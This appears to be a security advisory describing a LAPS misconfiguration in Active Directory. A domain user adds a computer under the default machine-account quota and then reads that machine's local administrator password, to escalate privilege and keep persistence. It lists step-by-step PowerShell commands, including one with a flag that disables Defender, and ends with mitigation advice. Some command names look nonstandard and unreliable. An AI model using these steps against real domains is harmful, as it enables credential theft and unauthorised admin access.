If the ms-DS-Machine-Account-Quota
attribute value is default and there is no delegation about domain join permissions to add computer to Active Directory , a domain user can add computer account to domain using the ms-ds-machine-account-quota
attribute . The domain user reads password (ms-mcs-admpwd
) of local administrator user for the added host after LAPS is installed and uses the password for persistence. When setting up LAPS, only certain users are assigned password reading permission. However, the user obtains All extended rights
over the added computer so that reads LAPS password. The user can bypass GPO restrictions obtaining password of local admin user, even after the user no longer has local Administrator privileges on a machine. For example, user can edit registry settings or add own account to local administrators group after GPO which removes undefined users from local administrators group.
- Open non-domain joined Windows virtual machine.
- Download LAPS.x64.msi and install it with powershell module extension (AdmPwd.PS)
- Import AdmPwd.PS
-
Import-Module AdmPwd.PS
- Add computer to Active Directory with domain user creds:
-
Add-ComputerToDomainWithUserRights
- Read local admin password and determine password policy:
-
If you are still a member of local administrators after updating GPO.
Read ms-mcs-admpwd attribute via PowerView.ps1:Get-LapsLocalAdminPassword -disableDefender
-
If you are not a member of local administrators after updating GPO.
Read ms-mcs-admpwd attribute via AdmPwd.PS:Get-LapsAdmPwd -LapsInstalled
-
-
A domain user can escalate privilege over computer that was added by own when a laps gpo is applied to computer. (documented in this blog):
a. The machine account password change is initiated by the computer every 30 days by default.
b. The restricted groups gpo can remove the user from local administrators group.
The user still can escalate privilege to local admin readingms-mcs-admpwd
after above two situations. -
The Laps gpo is applied to
PC
organizational unit andlapsAdmin
group delegated for LAPS management.
The user has adding computer right toPC
organizational unit and is not member oflapsAdmin
group.
The user can readms-mcs-admpwd
attribute of computer that was added by own.
Microsoft LAPS installation document is updated. So you can make configuration according to Microsoft LAPS_OperationsGuide.docx and LAPS_TechnicalSpecification documents. https://www.microsoft.com/en-us/download/confirmation.aspx?id=46899 If Laps Administrator Password Solution is used, set ms-ds-machine-account-quota as "0" or delegation must be applied a user group for adding computer to domain. Otherwise user can add computer to domain and read local admin user password, define password complexity via LAPS misconfiguration.